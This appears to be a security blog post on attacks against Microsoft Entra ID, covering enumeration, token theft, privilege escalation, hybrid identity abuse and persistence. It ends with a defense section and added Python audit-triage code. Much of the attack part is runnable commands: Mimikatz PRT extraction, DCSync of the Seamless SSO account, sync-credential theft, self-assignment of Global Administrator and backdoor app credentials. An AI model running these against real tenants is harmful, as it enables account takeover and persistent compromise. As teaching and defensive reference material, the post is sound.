Azure AD and Entra ID attack techniques

Azure AD (Entra ID) Attacks

Microsoft Entra ID (Azure AD) attacks including enumeration, privilege escalation, token abuse, and hybrid identity exploitation.

Jan 20, 2026
Updated Dec 11, 2025

Introduction

Microsoft Entra ID (formerly Azure Active Directory) is the identity backbone of Microsoft's cloud ecosystem, serving as the authentication provider for Microsoft 365, Azure resources, and thousands of third-party applications. Its deep integration with on-premises Active Directory through hybrid deployments creates unique attack vectors that span both environments.

Understanding Entra ID security is essential for any organization using Microsoft cloud services, as compromising a single identity can lead to access across multiple applications and resources.

Entra ID Architecture

Key Components

Component             Description
--------------------  --------------------------------
Tenant                Organization's Entra ID instance
Users                 Human identities
Groups                Collections of users/devices
Service Principals    Application identities
Managed Identities    Azure resource identities
Applications          Registered apps with permissions
Administrative Units  Delegated admin scopes

Role Hierarchy

Global Administrator
├── Privileged Role Administrator
├── Application Administrator
├── Cloud Application Administrator
├── User Administrator
├── Groups Administrator
├── Exchange Administrator
├── SharePoint Administrator
├── Intune Administrator
└── ... 60+ built-in roles

Enumeration Techniques

Unauthenticated Enumeration

# Check if tenant exists
https://login.microsoftonline.com/<tenant>/v2.0/.well-known/openid-configuration

# User enumeration via login response
# Different error messages for valid vs invalid users
# Tools: o365creeper, TeamFiltration

# Azure AD Connect exposed
# Default port 443 on AD Connect server

Authenticated Enumeration

# Using AzureAD PowerShell module
Connect-AzureAD
Get-AzureADUser -All $true
Get-AzureADGroup -All $true
Get-AzureADServicePrincipal -All $true

# Using Microsoft Graph API
Connect-MgGraph
Get-MgUser -All
Get-MgGroup -All
Get-MgServicePrincipal -All

# Get current user's roles
Get-AzureADDirectoryRole | ForEach-Object {
    $role = $_
    Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId | ForEach-Object {
        [PSCustomObject]@{
            Role = $role.DisplayName
            Member = $_.DisplayName
        }
    }
}

ROADtools Enumeration

# Authenticate
roadrecon auth -u <user@tenant.com> -p password

# Gather data
roadrecon gather

# Analyze and visualize
roadrecon gui
# Opens web interface at http://127.0.0.1:5000

AzureHound

# Collect Azure AD data for BloodHound
azurehound -u <user@tenant.com> -p password list --tenant tenant.com

# Import into BloodHound
# Analyze attack paths in BloodHound GUI

Token-Based Attacks

Access Token Theft

# Extract tokens from az cli (legacy token cache location)
$tokens = Get-Content "$env:USERPROFILE\.azure\accessTokens.json" | ConvertFrom-Json

# Extract from Azure PowerShell
$context = Get-AzContext
$token = $context.TokenCache.ReadItems() | Where-Object {$_.Resource -eq "https://graph.microsoft.com"}

# Use the token with Microsoft Graph
$headers = @{Authorization = "Bearer $($token.AccessToken)"}
Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/me" -Headers $headers

Refresh Token Abuse

# Refresh tokens can get new access tokens
# If you have a refresh token, you can request access tokens for any resource the app has consent for

# Using roadrecon
roadrecon auth --refresh-token <token>
roadrecon gather

Primary Refresh Token (PRT)

# PRT is used for SSO across Azure AD-joined devices
# Extraction requires admin on device

# Using Mimikatz
sekurlsa::cloudap

# Using AADInternals
Get-AADIntUserPRTToken

# PRT can be used to get access tokens without password

Privilege Escalation

# If you can register applications or modify existing ones:

# 1. Register app with dangerous permissions
# 2. Get admin to consent (phishing, social engineering)
# 3. Use app permissions for escalation

# Dangerous permissions to request:
# - Directory.ReadWrite.All
# - RoleManagement.ReadWrite.Directory
# - Application.ReadWrite.All
# - User.ReadWrite.All

Service Principal Abuse

# If you control a service principal with privileged permissions:

# Add credentials to the service principal's application object
$creds = New-AzureADApplicationPasswordCredential -ObjectId <app-object-id>

# Authenticate as the service principal
$appId = "<application-client-id>"
$tenantId = "<tenant-id>"
$securePassword = ConvertTo-SecureString $creds.Value -AsPlainText -Force
$pscredential = New-Object System.Management.Automation.PSCredential($appId, $securePassword)
Connect-AzureAD -Credential $pscredential -ServicePrincipal -TenantId $tenantId

Administrative Unit Escape

# If admin is scoped to AU but has certain permissions,
# they may be able to manage users outside their AU

# Check AU membership
Get-AzureADMSAdministrativeUnitMember -Id <AU-id>

Role Assignment Abuse

# If you have Privileged Role Administrator:
# Add yourself to Global Administrator

$roleDefinition = Get-AzureADMSRoleDefinition | Where-Object {$_.DisplayName -eq "Global Administrator"}
$user = Get-AzureADUser -ObjectId "<your-upn>"

New-AzureADMSRoleAssignment `
    -DirectoryScopeId "/" `
    -RoleDefinitionId $roleDefinition.Id `
    -PrincipalId $user.ObjectId

Hybrid Identity Attacks

Azure AD Connect Abuse

# Azure AD Connect syncs on-prem AD to Azure AD
# The sync account has extensive permissions in both directories

# Extract credentials (requires admin on AD Connect server)
# Using AADInternals
Get-AADIntSyncCredentials

# Get the sync account password
# Can be used to DCSync on-prem or modify cloud objects

Seamless SSO Exploitation

# Seamless SSO uses a computer account AZUREADSSOACC$
# Its Kerberos keys can forge tickets for any Azure AD user

# Extract with DCSync
lsadump::dcsync /domain:corp.local /user:AZUREADSSOACC$

# Forge ticket
# This allows authentication to Azure AD as any synced user

Pass-the-PRT

# Similar to Pass-the-Hash but for Azure AD
# Requires PRT extracted from Azure AD joined device

# Using AADInternals
$prt = Get-AADIntUserPRTToken
$at = Get-AADIntAccessTokenForAADGraph -PRTToken $prt

Application Attacks

1. Attacker registers malicious application
2. Sends phishing link with OAuth consent URL
3. Victim grants consent to application
4. Application now has access to victim's data

# Defense: Restrict user consent, require admin approval

Application Secret Enumeration

# If you have Application.Read.All
Get-AzureADApplication | ForEach-Object {
    $app = $_
    Get-AzureADApplicationPasswordCredential -ObjectId $app.ObjectId | ForEach-Object {
        [PSCustomObject]@{
            AppName = $app.DisplayName
            SecretHint = $_.CustomKeyIdentifier
            EndDate = $_.EndDate
        }
    }
}

Federation Abuse (Golden SAML)

# If you compromise AD FS signing certificate:
# Can forge SAML tokens for any federated user

# Using AADInternals
Open-AADIntOffice365Portal -ImmutableID <user-id> -Issuer <federation-url> -PfxFileName <adfs-cert.pfx>

Persistence Techniques

Application Backdoors

# Add credentials to existing application
New-AzureADApplicationPasswordCredential -ObjectId <app-object-id> -CustomKeyIdentifier "Backup"

# Add new certificate
$cert = New-SelfSignedCertificate -Subject "CN=Backdoor" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
New-AzureADApplicationKeyCredential -ObjectId <app-object-id> -Type AsymmetricX509Cert -Usage Verify -Value $keyValue

Service Principal Persistence

# Create new service principal with privileges
$app = New-AzureADApplication -DisplayName "Legitimate App"
$sp = New-AzureADServicePrincipal -AppId $app.AppId
$creds = New-AzureADApplicationPasswordCredential -ObjectId $app.ObjectId

# Assign privileged role
New-AzureADMSRoleAssignment -RoleDefinitionId <role-id> -PrincipalId $sp.ObjectId -DirectoryScopeId "/"

Guest User Backdoor

# Invite persistent guest account
New-AzureADMSInvitation `
    -InvitedUserEmailAddress "<external-email>" `
    -InviteRedirectUrl "https://myapps.microsoft.com" `
    -SendInvitationMessage $false

# Assign roles to guest

Detection and Defense

Key Events to Monitor

# Azure AD Sign-in Logs
- Unusual locations
- Impossible travel
- Legacy authentication
- Failed MFA
- Service principal sign-ins

# Azure AD Audit Logs
- New application registrations
- Consent grants
- Role assignments
- Credential additions
- Policy changes
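The audit-log categories listed above (and the role-assignment and app-permission abuse described earlier) can be triaged from exported records. This is an added example, not code from the original post: the records are constructed in the shape of Microsoft Graph directoryAudits objects, and the severity ratings are this example's own.

```python
# Added example: triage exported Entra ID audit records for the event classes the
# page lists. SAMPLE_AUDIT_LOG is CONSTRUCTED in Graph directoryAudits shape.
SAMPLE_AUDIT_LOG = [
    {"activityDisplayName": "Add service principal credentials",
     "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example"}},
     "targetResources": [{"displayName": "Legitimate App", "type": "ServicePrincipal"}]},
    {"activityDisplayName": "Consent to application",
     "initiatedBy": {"user": {"userPrincipalName": "bob@contoso.example"}},
     "targetResources": [{"displayName": "Mail Helper", "type": "ServicePrincipal",
                          "modifiedProperties": [{"displayName": "ConsentAction.Permissions",
                                                  "newValue": "Mail.Read Directory.ReadWrite.All"}]}]},
    {"activityDisplayName": "Add member to role",
     "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example"}},
     "targetResources": [{"displayName": "carol@contoso.example", "type": "User",
                          "modifiedProperties": [{"displayName": "Role.DisplayName",
                                                  "newValue": "\"Global Administrator\""}]}]},
    {"activityDisplayName": "Update user",  # routine change, should not be flagged
     "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example"}},
     "targetResources": [{"displayName": "dave@contoso.example", "type": "User"}]},
]

# Baseline severity per watched activity; the ratings are this example's own choice.
WATCHED = {"Add application": "medium", "Add service principal credentials": "high",
           "Consent to application": "high", "Add member to role": "high",
           "Update conditional access policy": "high"}
# Permissions the page names as dangerous when granted to an application.
DANGEROUS_PERMS = {"Directory.ReadWrite.All", "RoleManagement.ReadWrite.Directory",
                   "Application.ReadWrite.All", "User.ReadWrite.All"}

def triage(records):
    """One finding per watched record; critical if it grants a dangerous permission or GA."""
    findings = []
    for rec in records:
        activity = rec.get("activityDisplayName")
        if activity not in WATCHED:
            continue
        who = rec.get("initiatedBy", {})
        # Actor may be a user (UPN) or an application (service principal sign-in).
        actor = (who.get("user") or {}).get("userPrincipalName") or (who.get("app") or {}).get("displayName", "unknown")
        targets = rec.get("targetResources", [])
        # Gather every reported new value, stripping the JSON quoting Graph applies.
        new_values = " ".join((p.get("newValue") or "").replace('"', "")
                              for t in targets for p in t.get("modifiedProperties", []))
        severity = WATCHED[activity]
        if "Global Administrator" in new_values or DANGEROUS_PERMS & set(new_values.split()):
            severity = "critical"
        findings.append({"severity": severity, "activity": activity, "actor": actor,
                         "targets": [t.get("displayName", "") for t in targets]})
    return findings
```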

Defensive Measures

  1. Conditional Access - Require MFA, block legacy auth
  2. PIM - Just-in-time privileged access
  3. Admin Consent Workflow - Prevent illicit consent
  4. Privileged Access Workstations - Secure admin access
  5. Cloud App Security - Monitor for anomalies
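The consent and app-registration settings behind measure 3 (and behind the "Restrict user consent" defense in the Application Attacks section) live in the tenant's authorization policy. As an added example that is not part of the original post, the check below compares a permissive snapshot with a hardened one; field names follow Microsoft Graph's authorizationPolicy resource, and both snapshots are constructed.

```python
# Added example: audit the tenant-wide authorization policy for the settings that
# enable self-service app registration, illicit consent and open guest invites.
# Field names follow GET /policies/authorizationPolicy; snapshots are CONSTRUCTED.
PERMISSIVE_POLICY = {
    "allowInvitesFrom": "everyone",
    "defaultUserRolePermissions": {
        "allowedToCreateApps": True,
        # Legacy grant policy: users may consent to any delegated permission.
        "permissionGrantPoliciesAssigned":
            ["ManagePermissionGrantsForSelf.microsoft-user-default-legacy"],
    },
}
HARDENED_POLICY = {
    "allowInvitesFrom": "adminsAndGuestInviters",
    "defaultUserRolePermissions": {
        "allowedToCreateApps": False,
        # Empty list disables user consent; the admin consent workflow handles requests.
        "permissionGrantPoliciesAssigned": [],
    },
}

def assess(policy):
    """Return a list of weak-setting findings; empty means none of the checks fired."""
    findings = []
    perms = policy.get("defaultUserRolePermissions", {})
    if perms.get("allowedToCreateApps", True):
        findings.append("any user can register applications (app-permission escalation path)")
    grants = perms.get("permissionGrantPoliciesAssigned", [])
    if any(g.endswith("microsoft-user-default-legacy") for g in grants):
        findings.append("users can consent to any permission (illicit consent grant path)")
    elif grants:
        findings.append("user consent allowed for low-impact permissions; review the grant policy")
    if policy.get("allowInvitesFrom") == "everyone":
        findings.append("anyone, including guests, can invite external users (guest backdoor path)")
    return findings
```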

Tools Reference

Tool          Purpose
------------  ------------------------
ROADtools     Enumeration and analysis
AzureHound    Attack path mapping
AADInternals  Offensive toolkit
MicroBurst    Security assessment
PowerZure     Offensive framework



Azure AD (Entra ID) Attacks | Drake Axelrod